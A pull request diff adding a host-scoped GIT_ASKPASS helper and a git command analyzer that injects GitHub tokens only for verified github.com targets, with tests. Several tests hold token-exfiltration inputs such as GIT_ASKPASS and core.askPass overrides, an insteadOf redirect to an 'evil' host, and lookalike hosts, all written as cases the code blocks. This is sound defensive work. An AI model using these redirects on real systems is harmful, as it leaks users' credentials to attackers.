### PR TITLE
Mint GitHub App tokens for plain git commands

### DIFF
--- a/src/bundled-plugins/github-cli-auth/git-askpass.test.ts
+++ b/src/bundled-plugins/github-cli-auth/git-askpass.test.ts
@@ -44,3 +44,47 @@ describe('ensureGitAskPassHelper', () => {
     expect(mode).not.toBe(0)
   })
 })
+
+describe('ensureGitAskPassHelper — host-scoped behavior (executed)', () => {
+  async function run(promptArg: string): Promise<{ code: number; out: string }> {
+    const path = await tmpHelperPath()
+    await ensureGitAskPassHelper(path)
+    const proc = Bun.spawn({
+      cmd: [path, promptArg],
+      env: { TYPECLAW_GIT_TOKEN: 'ghs_secret_token' },
+      stdout: 'pipe',
+      stderr: 'ignore',
+    })
+    const code = await proc.exited
+    const out = (await new Response(proc.stdout).text()).trim()
+    return { code, out }
+  }
+
+  test('emits the token for a github.com password prompt', async () => {
+    const { code, out } = await run("Password for 'https://github.com': ")
+    expect(code).toBe(0)
+    expect(out).toBe('ghs_secret_token')
+  })
+
+  test('emits x-access-token for a github.com username prompt', async () => {
+    const { code, out } = await run("Username for 'https://github.com': ")
+    expect(code).toBe(0)
+    expect(out).toBe('x-access-token')
+  })
+
+  test('refuses (exit 1, no token) for a non-github host prompt', async () => {
+    const { code, out } = await run("Password for 'https://evil.example': ")
+    expect(code).toBe(1)
+    expect(out).toBe('')
+  })
+
+  test('is not fooled by a lookalike host (evil-github.com)', async () => {
+    const { out } = await run("Password for 'https://evil-github.com': ")
+    expect(out).toBe('')
+  })
+
+  test('is not fooled by a suffix lookalike host (github.com.evil)', async () => {
+    const { out } = await run("Password for 'https://github.com.evil.test': ")
+    expect(out).toBe('')
+  })
+})

--- a/src/bundled-plugins/github-cli-auth/git-askpass.test.ts
+++ b/src/bundled-plugins/github-cli-auth/git-askpass.test.ts
@@ -1,0 +1,46 @@
+import { afterEach, describe, expect, test } from 'bun:test'
+import { mkdtemp, readFile, stat } from 'node:fs/promises'
+import { tmpdir } from 'node:os'
+import { join } from 'node:path'
+
+import { ensureGitAskPassHelper, resetGitAskPassHelperForTests } from './git-askpass'
+
+afterEach(() => {
+  resetGitAskPassHelperForTests()
+})
+
+async function tmpHelperPath() {
+  const dir = await mkdtemp(join(tmpdir(), 'typeclaw-askpass-'))
+  return join(dir, 'typeclaw-git-askpass')
+}
+
+describe('ensureGitAskPassHelper', () => {
+  test('writes the helper and returns its path', async () => {
+    const path = await tmpHelperPath()
+    expect(await ensureGitAskPassHelper(path)).toBe(path)
+    expect((await stat(path)).isFile()).toBe(true)
+  })
+
+  test('helper content contains no token, only the env var name', async () => {
+    const path = await tmpHelperPath()
+    await ensureGitAskPassHelper(path)
+    const content = await readFile(path, 'utf8')
+    expect(content).toContain('TYPECLAW_GIT_TOKEN')
+    expect(content).toContain('x-access-token')
+    expect(content).not.toMatch(/gh[ps]_/)
+  })
+
+  test('concurrent calls share one write and resolve to the same path', async () => {
+    const path = await tmpHelperPath()
+    const [a, b] = await Promise.all([ensureGitAskPassHelper(path), ensureGitAskPassHelper(path)])
+    expect(a).toBe(path)
+    expect(b).toBe(path)
+  })
+
+  test('helper is executable', async () => {
+    const path = await tmpHelperPath()
+    await ensureGitAskPassHelper(path)
+    const mode = (await stat(path)).mode & 0o111
+    expect(mode).not.toBe(0)
+  })
+})

--- a/src/bundled-plugins/github-cli-auth/git-askpass.ts
+++ b/src/bundled-plugins/github-cli-auth/git-askpass.ts
@@ -1,0 +1,49 @@
+import { chmod, mkdir, rename, writeFile } from 'node:fs/promises'
+import { dirname, join } from 'node:path'
+
+// A GIT_ASKPASS helper git invokes for username/password prompts. The token
+// rides in TYPECLAW_GIT_TOKEN (env, via the bash env overlay), NEVER in argv or
+// git config — so it cannot leak through process listings, logs, or .git/config.
+// The script contents are constant and secret-free; only the env value is secret.
+const ASKPASS_SCRIPT = `#!/bin/sh
+case "$1" in
+  *Username*) printf '%s\\n' 'x-access-token' ;;
+  *) printf '%s\\n' "$TYPECLAW_GIT_TOKEN" ;;
+esac
+`
+
+// /usr is --ro-bind mounted into the per-tool bwrap sandbox (src/sandbox/build.ts),
+// so a helper here is readable by sandboxed bash; the per-session /tmp bind is not
+// a stable path. TYPECLAW_GIT_ASKPASS_PATH overrides it for tests/CI, which
+// cannot write under /usr.
+const DEFAULT_ASKPASS_PATH = '/usr/local/bin/typeclaw-git-askpass'
+
+function defaultPath(): string {
+  const override = process.env.TYPECLAW_GIT_ASKPASS_PATH
+  return override !== undefined && override !== '' ? override : DEFAULT_ASKPASS_PATH
+}
+
+let ensurePromise: Promise<string> | null = null
+
+export function resetGitAskPassHelperForTests(): void {
+  ensurePromise = null
+}
+
+// Writes the helper once per process (idempotent, race-safe via the shared
+// promise) and returns its absolute path. Write-then-rename so a concurrent
+// reader never sees a partial file.
+export function ensureGitAskPassHelper(path: string = defaultPath()): Promise<string> {
+  if (ensurePromise !== null) return ensurePromise
+  ensurePromise = (async () => {
+    await mkdir(dirname(path), { recursive: true })
+    const tmp = join(dirname(path), `.typeclaw-git-askpass.${process.pid}.tmp`)
+    await writeFile(tmp, ASKPASS_SCRIPT, { mode: 0o755 })
+    await chmod(tmp, 0o755)
+    await rename(tmp, path)
+    return path
+  })().catch((err) => {
+    ensurePromise = null
+    throw err
+  })
+  return ensurePromise
+}

--- a/src/bundled-plugins/github-cli-auth/git-askpass.ts
+++ b/src/bundled-plugins/github-cli-auth/git-askpass.ts
@@ -1,3 +1,4 @@
+import { randomBytes } from 'node:crypto'
 import { chmod, mkdir, rename, writeFile } from 'node:fs/promises'
 import { dirname, join } from 'node:path'
 
@@ -5,7 +6,20 @@ import { dirname, join } from 'node:path'
 // rides in TYPECLAW_GIT_TOKEN (env, via the bash env overlay), NEVER in argv or
 // git config — so it cannot leak through process listings, logs, or .git/config.
 // The script contents are constant and secret-free; only the env value is secret.
+//
+// Host-scoped: git's prompt is `Username for 'https://github.com': ` etc. We
+// answer ONLY when the prompt names github.com; for any other host (e.g. one an
+// `insteadOf`/`pushurl` rewrite redirected to) we exit non-zero WITHOUT printing
+// the token, so a redirect can never exfiltrate it. The analyzer already blocks
+// the known redirect vectors; this is defense-in-depth at the credential edge.
+// The host match is on \`//github.com/\` and \`//github.com'\` (git wraps the URL
+// in quotes: \`Password for 'https://github.com': \`) so it cannot be fooled by
+// \`evil-github.com\` or \`github.com.evil/\`.
 const ASKPASS_SCRIPT = `#!/bin/sh
+case "$1" in
+  *//github.com/*|*//github.com\\'*) : ;;
+  *) exit 1 ;;
+esac
 case "$1" in
   *Username*) printf '%s\\n' 'x-access-token' ;;
   *) printf '%s\\n' "$TYPECLAW_GIT_TOKEN" ;;
@@ -30,14 +44,16 @@ export function resetGitAskPassHelperForTests(): void {
 }
 
 // Writes the helper once per process (idempotent, race-safe via the shared
-// promise) and returns its absolute path. Write-then-rename so a concurrent
-// reader never sees a partial file.
+// promise) and returns its absolute path. The temp name is unpredictable and
+// opened with `wx` (exclusive create, fails on an existing file/symlink) so a
+// planted symlink cannot redirect the write; then atomically renamed so a
+// concurrent reader never sees a partial file.
 export function ensureGitAskPassHelper(path: string = defaultPath()): Promise<string> {
   if (ensurePromise !== null) return ensurePromise
   ensurePromise = (async () => {
     await mkdir(dirname(path), { recursive: true })
-    const tmp = join(dirname(path), `.typeclaw-git-askpass.${process.pid}.tmp`)
-    await writeFile(tmp, ASKPASS_SCRIPT, { mode: 0o755 })
+    const tmp = join(dirname(path), `.typeclaw-git-askpass.${randomBytes(8).toString('hex')}.tmp`)
+    await writeFile(tmp, ASKPASS_SCRIPT, { mode: 0o755, flag: 'wx' })
     await chmod(tmp, 0o755)
     await rename(tmp, path)
     return path

--- a/src/bundled-plugins/github-cli-auth/git-command.test.ts
+++ b/src/bundled-plugins/github-cli-auth/git-command.test.ts
@@ -192,3 +192,68 @@ describe('analyzeGitCommand — config value flag is not mistaken for subcommand
     })
   })
 })
+
+describe('analyzeGitCommand — push uses pushurl, not fetch url', () => {
+  // A remote whose fetch url and push url point at different repos/owners.
+  const splitRemote = resolvers({
+    resolveRemoteUrl: async (_cwd, _remote, forPush) =>
+      forPush ? 'https://github.com/acme/widgets.git' : 'https://github.com/other/fetchonly.git',
+  })
+
+  test('push resolves the push url (forPush=true)', async () => {
+    expect(await analyze('git push origin main', splitRemote)).toEqual({ kind: 'inject', repoSlug: 'acme/widgets' })
+  })
+
+  test('fetch resolves the fetch url (forPush=false)', async () => {
+    expect(await analyze('git fetch origin', splitRemote)).toEqual({ kind: 'inject', repoSlug: 'other/fetchonly' })
+  })
+
+  test('forPush flag is passed to the resolver per subcommand', async () => {
+    const seen: Array<{ remote: string; forPush: boolean }> = []
+    const r = resolvers({
+      resolveRemoteUrl: async (_cwd, remote, forPush) => {
+        seen.push({ remote, forPush })
+        return 'https://github.com/acme/widgets.git'
+      },
+    })
+    await analyze('git push origin main', r)
+    await analyze('git fetch origin', r)
+    expect(seen).toEqual([
+      { remote: 'origin', forPush: true },
+      { remote: 'origin', forPush: false },
+    ])
+  })
+})
+
+describe('analyzeGitCommand — multi-remote resolution', () => {
+  test('fetch --multiple across two owners blocks', async () => {
+    const r = resolvers({
+      resolveRemoteUrl: async (_cwd, remote) =>
+        remote === 'origin' ? 'https://github.com/acme/widgets.git' : 'https://github.com/other/widgets.git',
+    })
+    expect((await analyze('git fetch --multiple origin upstream', r)).kind).toBe('block')
+  })
+
+  test('fetch --multiple across one owner injects', async () => {
+    const r = resolvers({
+      resolveRemoteUrl: async (_cwd, remote) =>
+        remote === 'origin' ? 'https://github.com/acme/widgets.git' : 'https://github.com/acme/tools.git',
+    })
+    expect(await analyze('git fetch --multiple origin upstream', r)).toEqual({
+      kind: 'inject',
+      repoSlug: 'acme/widgets',
+    })
+  })
+
+  test('push origin main treats main as a refspec, not a second remote', async () => {
+    const seen: string[] = []
+    const r = resolvers({
+      resolveRemoteUrl: async (_cwd, remote) => {
+        seen.push(remote)
+        return 'https://github.com/acme/widgets.git'
+      },
+    })
+    await analyze('git push origin main', r)
+    expect(seen).toEqual(['origin'])
+  })
+})

--- a/src/bundled-plugins/github-cli-auth/git-command.test.ts
+++ b/src/bundled-plugins/github-cli-auth/git-command.test.ts
@@ -30,6 +30,13 @@ describe('parseGithubRepoFromGitUrl', () => {
   test('parses ssh url', () => {
     expect(parseGithubRepoFromGitUrl('ssh://git@github.com/acme/widgets.git')).toBe('acme/widgets')
   })
+  test('parses ssh url with port', () => {
+    expect(parseGithubRepoFromGitUrl('ssh://git@github.com:22/acme/widgets.git')).toBe('acme/widgets')
+  })
+  test('rejects scp-like url with #/? suffix (would yield a malformed slug)', () => {
+    expect(parseGithubRepoFromGitUrl('git@github.com:acme/widgets.git#main')).toBeNull()
+    expect(parseGithubRepoFromGitUrl('git@github.com:acme/widgets?x=1')).toBeNull()
+  })
   test('rejects non-github host', () => {
     expect(parseGithubRepoFromGitUrl('https://gitlab.com/acme/widgets')).toBeNull()
   })
@@ -163,8 +170,17 @@ describe('analyzeGitCommand — cd rewrite', () => {
     const result = await analyze('cd /agent/workspace/repo && git push', ghRemote)
     expect(result).toMatchObject({ kind: 'inject', rewrittenCommand: "git -C '/agent/workspace/repo' push" })
   })
-  test('unsafe cd with variable is not treated as safe prefix and blocks', async () => {
-    expect((await analyze('cd "$DIR" && git push origin main', ghRemote)).kind).toBe('block')
+  test('unsafe cd with variable passes through (cannot faithfully rewrite cwd)', async () => {
+    expect((await analyze('cd "$DIR" && git push origin main', ghRemote)).kind).toBe('pass-through')
+  })
+  test('cd ~ passes through (shell expansion, not a literal path)', async () => {
+    expect((await analyze('cd ~ && git push origin main', ghRemote)).kind).toBe('pass-through')
+  })
+  test('cd - passes through (shell OLDPWD, not a literal path)', async () => {
+    expect((await analyze('cd - && git push origin main', ghRemote)).kind).toBe('pass-through')
+  })
+  test('cd dir && git -C other blocks (would stack two -C and change cwd)', async () => {
+    expect((await analyze('cd workspace/repo && git -C other push origin main', ghRemote)).kind).toBe('block')
   })
 })
 
@@ -183,13 +199,10 @@ describe('analyzeGitCommand — git -C resolution', () => {
   })
 })
 
-describe('analyzeGitCommand — config value flag is not mistaken for subcommand', () => {
-  test('git -c key=value push', async () => {
+describe('analyzeGitCommand — config value flag is recognized as the subcommand boundary', () => {
+  test('git -c key=value push is blocked (user -c can redirect auth/destination)', async () => {
     const r = resolvers({ resolveRemoteUrl: async () => 'https://github.com/acme/widgets.git' })
-    expect(await analyze('git -c credential.helper= push origin main', r)).toEqual({
-      kind: 'inject',
-      repoSlug: 'acme/widgets',
-    })
+    expect((await analyze('git -c credential.helper= push origin main', r)).kind).toBe('block')
   })
 })
 
@@ -255,5 +268,67 @@ describe('analyzeGitCommand — multi-remote resolution', () => {
     })
     await analyze('git push origin main', r)
     expect(seen).toEqual(['origin'])
+  })
+})
+
+describe('analyzeGitCommand — token-exfil hardening', () => {
+  const ghRemote = resolvers({ resolveRemoteUrl: async () => 'https://github.com/acme/widgets.git' })
+
+  test('leading env assignment (GIT_ASKPASS override) blocks', async () => {
+    expect((await analyze('GIT_ASKPASS=/tmp/evil git clone https://github.com/acme/widgets.git')).kind).toBe('block')
+  })
+  test('git -c url.insteadOf blocks', async () => {
+    const cmd = 'git -c url.https://evil/.insteadOf=https://github.com/acme/ clone https://github.com/acme/widgets.git'
+    expect((await analyze(cmd)).kind).toBe('block')
+  })
+  test('git -c core.askPass blocks', async () => {
+    expect((await analyze('git -c core.askPass=/tmp/evil clone https://github.com/acme/widgets.git')).kind).toBe(
+      'block',
+    )
+  })
+  test('--git-dir / --work-tree blocks (git operates on a different repo)', async () => {
+    expect((await analyze('git --git-dir=/tmp/o/.git push origin main', ghRemote)).kind).toBe('block')
+    expect((await analyze('git --work-tree=/tmp/o push origin main', ghRemote)).kind).toBe('block')
+  })
+  test('--namespace / --exec-path blocks', async () => {
+    expect((await analyze('git --namespace=ns push origin main', ghRemote)).kind).toBe('block')
+    expect((await analyze('git --exec-path=/tmp/x push origin main', ghRemote)).kind).toBe('block')
+  })
+})
+
+describe('analyzeGitCommand — fetch/pull --all', () => {
+  const ghRemote = resolvers({ resolveRemoteUrl: async () => 'https://github.com/acme/widgets.git' })
+  test('fetch --all blocks (cannot enumerate every remote safely)', async () => {
+    expect((await analyze('git fetch --all', ghRemote)).kind).toBe('block')
+  })
+  test('pull --all blocks', async () => {
+    expect((await analyze('git pull --all', ghRemote)).kind).toBe('block')
+  })
+})
+
+describe('analyzeGitCommand — push-default fallback is push-only', () => {
+  const chain = resolvers({
+    resolveCurrentBranch: async () => 'main',
+    resolveRemoteUrl: async (_cwd, remote) => (remote === 'origin' ? 'https://github.com/acme/widgets.git' : null),
+  })
+  test('bare push falls back to origin', async () => {
+    expect(await analyze('git push', chain)).toEqual({ kind: 'inject', repoSlug: 'acme/widgets' })
+  })
+  test('bare fetch does NOT use push-default → pass-through', async () => {
+    expect((await analyze('git fetch', chain)).kind).toBe('pass-through')
+  })
+  test('bare ls-remote does NOT use push-default → pass-through', async () => {
+    expect((await analyze('git ls-remote', chain)).kind).toBe('pass-through')
+  })
+})
+
+describe('analyzeGitCommand — resolver errors fail safe', () => {
+  test('a throwing resolver → pass-through, not a crash', async () => {
+    const r = resolvers({
+      resolveRemoteUrl: async () => {
+        throw new Error('git subprocess boom')
+      },
+    })
+    expect((await analyze('git push origin main', r)).kind).toBe('pass-through')
   })
 })

--- a/src/bundled-plugins/github-cli-auth/git-command.test.ts
+++ b/src/bundled-plugins/github-cli-auth/git-command.test.ts
@@ -1,0 +1,194 @@
+import { describe, expect, test } from 'bun:test'
+
+import { analyzeGitCommand, type GitResolvers, parseGithubRepoFromGitUrl } from './git-command'
+
+const CWD = '/agent'
+
+function resolvers(overrides: Partial<GitResolvers> = {}): GitResolvers {
+  return {
+    resolveRemoteUrl: async () => null,
+    resolveConfig: async () => null,
+    resolveCurrentBranch: async () => null,
+    ...overrides,
+  }
+}
+
+async function analyze(command: string, r: GitResolvers = resolvers()) {
+  return analyzeGitCommand(command, { cwd: CWD, resolvers: r })
+}
+
+describe('parseGithubRepoFromGitUrl', () => {
+  test('parses https url', () => {
+    expect(parseGithubRepoFromGitUrl('https://github.com/acme/widgets')).toBe('acme/widgets')
+  })
+  test('parses https url with .git suffix', () => {
+    expect(parseGithubRepoFromGitUrl('https://github.com/acme/widgets.git')).toBe('acme/widgets')
+  })
+  test('parses scp-like url', () => {
+    expect(parseGithubRepoFromGitUrl('git@github.com:acme/widgets.git')).toBe('acme/widgets')
+  })
+  test('parses ssh url', () => {
+    expect(parseGithubRepoFromGitUrl('ssh://git@github.com/acme/widgets.git')).toBe('acme/widgets')
+  })
+  test('rejects non-github host', () => {
+    expect(parseGithubRepoFromGitUrl('https://gitlab.com/acme/widgets')).toBeNull()
+  })
+  test('rejects credential-bearing https url', () => {
+    expect(parseGithubRepoFromGitUrl('https://tok@github.com/acme/widgets')).toBeNull()
+  })
+  test('rejects local and relative paths', () => {
+    expect(parseGithubRepoFromGitUrl('/srv/repos/widgets.git')).toBeNull()
+    expect(parseGithubRepoFromGitUrl('../widgets')).toBeNull()
+  })
+  test('rejects missing owner or name', () => {
+    expect(parseGithubRepoFromGitUrl('https://github.com/acme')).toBeNull()
+  })
+})
+
+describe('analyzeGitCommand — pass-through', () => {
+  test('non-git command', async () => {
+    expect(await analyze('ls -la')).toEqual({ kind: 'pass-through' })
+  })
+  test('non-remote git subcommand (status)', async () => {
+    expect(await analyze('git status')).toEqual({ kind: 'pass-through' })
+  })
+  test('read-only git remote -v', async () => {
+    expect(await analyze('git remote -v')).toEqual({ kind: 'pass-through' })
+  })
+  test('remote resolver fails (no configured remote)', async () => {
+    expect(await analyze('git push origin main')).toEqual({ kind: 'pass-through' })
+  })
+  test('non-github remote url', async () => {
+    const r = resolvers({ resolveRemoteUrl: async () => 'https://gitlab.com/acme/widgets.git' })
+    expect(await analyze('git push origin main', r)).toEqual({ kind: 'pass-through' })
+  })
+  test('explicit non-github clone url', async () => {
+    expect(await analyze('git clone https://gitlab.com/acme/widgets.git')).toEqual({ kind: 'pass-through' })
+  })
+})
+
+describe('analyzeGitCommand — inject (explicit url)', () => {
+  test('clone https', async () => {
+    expect(await analyze('git clone https://github.com/acme/widgets.git')).toEqual({
+      kind: 'inject',
+      repoSlug: 'acme/widgets',
+    })
+  })
+  test('ls-remote scp-like', async () => {
+    expect(await analyze('git ls-remote git@github.com:acme/widgets.git')).toEqual({
+      kind: 'inject',
+      repoSlug: 'acme/widgets',
+    })
+  })
+  test('push --repo url', async () => {
+    expect(await analyze('git push --repo https://github.com/acme/widgets.git main')).toEqual({
+      kind: 'inject',
+      repoSlug: 'acme/widgets',
+    })
+  })
+})
+
+describe('analyzeGitCommand — inject (remote resolution)', () => {
+  const ghRemote = resolvers({ resolveRemoteUrl: async () => 'https://github.com/acme/widgets.git' })
+
+  test('fetch origin', async () => {
+    expect(await analyze('git fetch origin', ghRemote)).toEqual({ kind: 'inject', repoSlug: 'acme/widgets' })
+  })
+  test('pull origin main', async () => {
+    expect(await analyze('git pull origin main', ghRemote)).toEqual({ kind: 'inject', repoSlug: 'acme/widgets' })
+  })
+  test('push origin main', async () => {
+    expect(await analyze('git push origin main', ghRemote)).toEqual({ kind: 'inject', repoSlug: 'acme/widgets' })
+  })
+  test('push -u origin branch (value flag skipped)', async () => {
+    expect(await analyze('git push -u origin feature', ghRemote)).toEqual({ kind: 'inject', repoSlug: 'acme/widgets' })
+  })
+})
+
+describe('analyzeGitCommand — bare push remote resolution chain', () => {
+  test('uses branch.<cur>.pushRemote first', async () => {
+    const r = resolvers({
+      resolveCurrentBranch: async () => 'feature',
+      resolveConfig: async (_cwd, key) => (key === 'branch.feature.pushRemote' ? 'upstream' : null),
+      resolveRemoteUrl: async (_cwd, remote) => (remote === 'upstream' ? 'https://github.com/acme/widgets.git' : null),
+    })
+    expect(await analyze('git push', r)).toEqual({ kind: 'inject', repoSlug: 'acme/widgets' })
+  })
+  test('falls back to remote.pushDefault', async () => {
+    const r = resolvers({
+      resolveCurrentBranch: async () => 'feature',
+      resolveConfig: async (_cwd, key) => (key === 'remote.pushDefault' ? 'origin2' : null),
+      resolveRemoteUrl: async (_cwd, remote) => (remote === 'origin2' ? 'git@github.com:acme/widgets.git' : null),
+    })
+    expect(await analyze('git push', r)).toEqual({ kind: 'inject', repoSlug: 'acme/widgets' })
+  })
+  test('falls back to origin', async () => {
+    const r = resolvers({
+      resolveCurrentBranch: async () => 'main',
+      resolveRemoteUrl: async (_cwd, remote) => (remote === 'origin' ? 'https://github.com/acme/widgets.git' : null),
+    })
+    expect(await analyze('git push', r)).toEqual({ kind: 'inject', repoSlug: 'acme/widgets' })
+  })
+})
+
+describe('analyzeGitCommand — blocks', () => {
+  test('compound command (&&) blocks', async () => {
+    const r = resolvers({ resolveRemoteUrl: async () => 'https://github.com/acme/widgets.git' })
+    expect((await analyze('git push origin main && echo done', r)).kind).toBe('block')
+  })
+  test('token-bearing command with pipe blocks', async () => {
+    const r = resolvers({ resolveRemoteUrl: async () => 'https://github.com/acme/widgets.git' })
+    expect((await analyze('git push origin main | tee log', r)).kind).toBe('block')
+  })
+  test('token-bearing command with command substitution blocks', async () => {
+    expect((await analyze('git clone https://github.com/acme/widgets.git $(whoami)')).kind).toBe('block')
+  })
+  test('token-bearing command with semicolon blocks', async () => {
+    expect((await analyze('git clone https://github.com/acme/widgets.git; ls')).kind).toBe('block')
+  })
+})
+
+describe('analyzeGitCommand — cd rewrite', () => {
+  const ghRemote = resolvers({ resolveRemoteUrl: async () => 'https://github.com/acme/widgets.git' })
+
+  test('cd repo && git push is rewritten to git -C', async () => {
+    const result = await analyze('cd workspace/repo && git push origin main', ghRemote)
+    expect(result).toEqual({
+      kind: 'inject',
+      repoSlug: 'acme/widgets',
+      rewrittenCommand: "git -C '/agent/workspace/repo' push origin main",
+    })
+  })
+  test('cd with absolute path', async () => {
+    const result = await analyze('cd /agent/workspace/repo && git push', ghRemote)
+    expect(result).toMatchObject({ kind: 'inject', rewrittenCommand: "git -C '/agent/workspace/repo' push" })
+  })
+  test('unsafe cd with variable is not treated as safe prefix and blocks', async () => {
+    expect((await analyze('cd "$DIR" && git push origin main', ghRemote)).kind).toBe('block')
+  })
+})
+
+describe('analyzeGitCommand — git -C resolution', () => {
+  test('respects existing git -C for remote resolution', async () => {
+    const seen: string[] = []
+    const r = resolvers({
+      resolveRemoteUrl: async (cwd) => {
+        seen.push(cwd)
+        return 'https://github.com/acme/widgets.git'
+      },
+    })
+    const result = await analyze('git -C workspace/repo push origin main', r)
+    expect(result).toEqual({ kind: 'inject', repoSlug: 'acme/widgets' })
+    expect(seen).toContain('/agent/workspace/repo')
+  })
+})
+
+describe('analyzeGitCommand — config value flag is not mistaken for subcommand', () => {
+  test('git -c key=value push', async () => {
+    const r = resolvers({ resolveRemoteUrl: async () => 'https://github.com/acme/widgets.git' })
+    expect(await analyze('git -c credential.helper= push origin main', r)).toEqual({
+      kind: 'inject',
+      repoSlug: 'acme/widgets',
+    })
+  })
+})

--- a/src/bundled-plugins/github-cli-auth/git-command.test.ts
+++ b/src/bundled-plugins/github-cli-auth/git-command.test.ts
@@ -286,6 +286,16 @@ describe('analyzeGitCommand — token-exfil hardening', () => {
       'block',
     )
   })
+  test('git --config-env (separate arg) blocks', async () => {
+    expect((await analyze('git --config-env core.askPass=EVIL clone https://github.com/acme/widgets.git')).kind).toBe(
+      'block',
+    )
+  })
+  test('git --config-env=<name>=<envvar> (inline form) blocks', async () => {
+    expect((await analyze('git --config-env=core.askPass=EVIL clone https://github.com/acme/widgets.git')).kind).toBe(
+      'block',
+    )
+  })
   test('--git-dir / --work-tree blocks (git operates on a different repo)', async () => {
     expect((await analyze('git --git-dir=/tmp/o/.git push origin main', ghRemote)).kind).toBe('block')
     expect((await analyze('git --work-tree=/tmp/o push origin main', ghRemote)).kind).toBe('block')

--- a/src/bundled-plugins/github-cli-auth/git-command.ts
+++ b/src/bundled-plugins/github-cli-auth/git-command.ts
@@ -152,7 +152,10 @@ export async function analyzeGitCommand(
 // command means we cannot vouch for where the token goes — block.
 function hasDangerousGitConfig(args: readonly string[]): boolean {
   for (const arg of args) {
-    if (arg === '-c' || arg === '--config-env') return true
+    // git accepts both `--config-env <name>=<envvar>` and the inline
+    // `--config-env=<name>=<envvar>`; both must be caught. (`-c` has no inline
+    // `-c=…` form — git always takes the next token.)
+    if (arg === '-c' || arg === '--config-env' || arg.startsWith('--config-env=')) return true
     if (arg === '--git-dir' || arg.startsWith('--git-dir=')) return true
     if (arg === '--work-tree' || arg.startsWith('--work-tree=')) return true
     if (arg === '--namespace' || arg.startsWith('--namespace=')) return true
@@ -239,9 +242,24 @@ function looksLikeUrl(token: string): boolean {
   return false
 }
 
-// Flags that consume the FOLLOWING token, so a remote/URL positional is not
-// mistaken for a flag's value.
-const GIT_VALUE_FLAGS = new Set(['-C', '-c', '--git-dir', '--work-tree', '-o', '--origin', '-b', '--branch', '-u'])
+// Flags that consume the FOLLOWING token, so a positional after them (the
+// subcommand or a remote/URL) is not mistaken for the flag's value. Includes the
+// dangerous-config flags in their separate-arg form (`--config-env <v>`) so the
+// real subcommand is still located and hasDangerousGitConfig can fire.
+const GIT_VALUE_FLAGS = new Set([
+  '-C',
+  '-c',
+  '--config-env',
+  '--git-dir',
+  '--work-tree',
+  '--namespace',
+  '--exec-path',
+  '-o',
+  '--origin',
+  '-b',
+  '--branch',
+  '-u',
+])
 
 function extractExplicitUrl(subcommand: string, args: readonly string[]): string | null {
   // `git push --repo <url>` / `--repo=<url>`

--- a/src/bundled-plugins/github-cli-auth/git-command.ts
+++ b/src/bundled-plugins/github-cli-auth/git-command.ts
@@ -15,7 +15,10 @@ export type GitCommandDecision =
 
 // Returns null when the remote/config is absent or git fails — the analyzer
 // then passes through so git fails honestly rather than us guessing a repo.
-export type GitRemoteResolver = (cwd: string, remote: string) => Promise<string | null>
+// forPush selects the PUSH url (`git remote get-url --push`), which differs from
+// the fetch url when a remote sets `pushurl`; minting against the fetch url for a
+// push would scope the token to the wrong repo/owner.
+export type GitRemoteResolver = (cwd: string, remote: string, forPush: boolean) => Promise<string | null>
 export type GitConfigResolver = (cwd: string, key: string) => Promise<string | null>
 export type GitBranchResolver = (cwd: string) => Promise<string | null>
 
@@ -45,7 +48,8 @@ async function runGit(cwd: string, args: string[]): Promise<string | null> {
 }
 
 export const defaultGitResolvers: GitResolvers = {
-  resolveRemoteUrl: (cwd, remote) => runGit(cwd, ['remote', 'get-url', remote]),
+  resolveRemoteUrl: (cwd, remote, forPush) =>
+    runGit(cwd, forPush ? ['remote', 'get-url', '--push', remote] : ['remote', 'get-url', remote]),
   resolveConfig: (cwd, key) => runGit(cwd, ['config', '--get', key]),
   resolveCurrentBranch: (cwd) => runGit(cwd, ['symbolic-ref', '--short', 'HEAD']),
 }
@@ -119,16 +123,24 @@ async function resolveRepoSlugs(
   // clone needs an explicit URL; it has no configured-remote fallback.
   if (subcommand === 'clone') return []
 
-  const remoteName = extractRemoteName(args) ?? (await resolveDefaultPushRemote(cwd, resolvers))
-  if (remoteName === null) return []
-  if (looksLikeUrl(remoteName)) {
-    const slug = parseGithubRepoFromGitUrl(remoteName)
-    return slug === null ? [] : [slug]
+  // Only `push` consults the push url; fetch/pull/ls-remote use the fetch url.
+  const forPush = subcommand === 'push'
+
+  // EVERY named remote must be resolved, not just the first: `git fetch
+  // --multiple origin upstream` touches both, and feeding only one to the
+  // multi-owner guard would let a second-owner remote slip past and still mint.
+  const remoteNames = extractRemoteNames(args)
+  const remotes = remoteNames.length > 0 ? remoteNames : [await resolveDefaultPushRemote(cwd, resolvers)]
+
+  const slugs: string[] = []
+  for (const remote of remotes) {
+    if (remote === null) continue
+    const url = looksLikeUrl(remote) ? remote : await resolvers.resolveRemoteUrl(cwd, remote, forPush)
+    if (url === null) continue
+    const slug = parseGithubRepoFromGitUrl(url)
+    if (slug !== null) slugs.push(slug)
   }
-  const url = await resolvers.resolveRemoteUrl(cwd, remoteName)
-  if (url === null) return []
-  const slug = parseGithubRepoFromGitUrl(url)
-  return slug === null ? [] : [slug]
+  return slugs
 }
 
 // Mirrors git's own push-remote resolution order for a bare `git push`.
@@ -206,13 +218,18 @@ function findSubcommand(args: readonly string[]): string | undefined {
   return undefined
 }
 
-function extractRemoteName(args: readonly string[]): string | null {
+// The remote name(s) a command targets. Normally just the first positional —
+// later positionals are refspecs (`git push origin main` -> remote `origin`,
+// refspec `main`). With `--multiple` (fetch), EVERY positional is a remote, so
+// all are returned to feed the multi-owner guard. URL positionals are excluded
+// here; resolveRepoSlugs handles a bare-URL target directly.
+function extractRemoteNames(args: readonly string[]): string[] {
   const sub = findSubcommand(args)
-  if (sub === undefined) return null
-  const positionals = positionalsAfterSubcommand(sub, args)
-  const first = positionals[0]
-  if (first === undefined || looksLikeUrl(first)) return null
-  return first
+  if (sub === undefined) return []
+  const positionals = positionalsAfterSubcommand(sub, args).filter((p) => !looksLikeUrl(p))
+  if (positionals.length === 0) return []
+  if (args.includes('--multiple')) return positionals
+  return [positionals[0] as string]
 }
 
 function positionalsAfterSubcommand(subcommand: string, args: readonly string[]): string[] {

--- a/src/bundled-plugins/github-cli-auth/git-command.ts
+++ b/src/bundled-plugins/github-cli-auth/git-command.ts
@@ -1,0 +1,391 @@
+// Plain-`git` analog of analyzeGhCommand. `gh` names its repo in argv (`-R`);
+// `git` only implies it via a remote, so this RESOLVES the target repo:
+// explicit github.com URL -> remote name via `git remote get-url` -> the
+// branch.<cur>.pushRemote/remote.pushDefault/origin fallback chain. The slug
+// feeds the same per-repo mint the `gh` path uses; the token is injected via
+// GIT_ASKPASS env, never into the command string.
+
+export type GitCommandDecision =
+  | { kind: 'pass-through' }
+  | { kind: 'block'; reason: string }
